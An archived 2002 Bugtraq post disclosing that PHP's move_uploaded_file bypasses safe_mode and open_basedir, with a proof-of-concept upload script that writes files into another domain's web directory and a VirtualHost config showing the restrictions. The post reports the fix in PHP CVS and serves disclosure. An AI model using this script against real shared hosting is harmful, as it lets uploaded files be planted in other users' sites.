Home page logo
/

bugtraq logo Bugtraq mailing list archives

move_uploaded_file breaks safe_mode restrictions in PHP
From: "Tozz" <tozz () embrace selwerd nl>
Date: Sun, 17 Mar 2002 23:23:34 +0100

Hey

Its possible to circumvent (probadly spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.

You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )

<?

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>

As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.

Virtualhost configuration snippet:

<VirtualHost IP_HERE>
        DocumentRoot /domains/whatever.com/public_html/root/
        ServerName root.whatever.com
        CustomLog /domains/whatever.com/logs/access_log combined
        ErrorLog /domains/whatever.com/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>

As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.

PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.

Bye,
Tozz




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]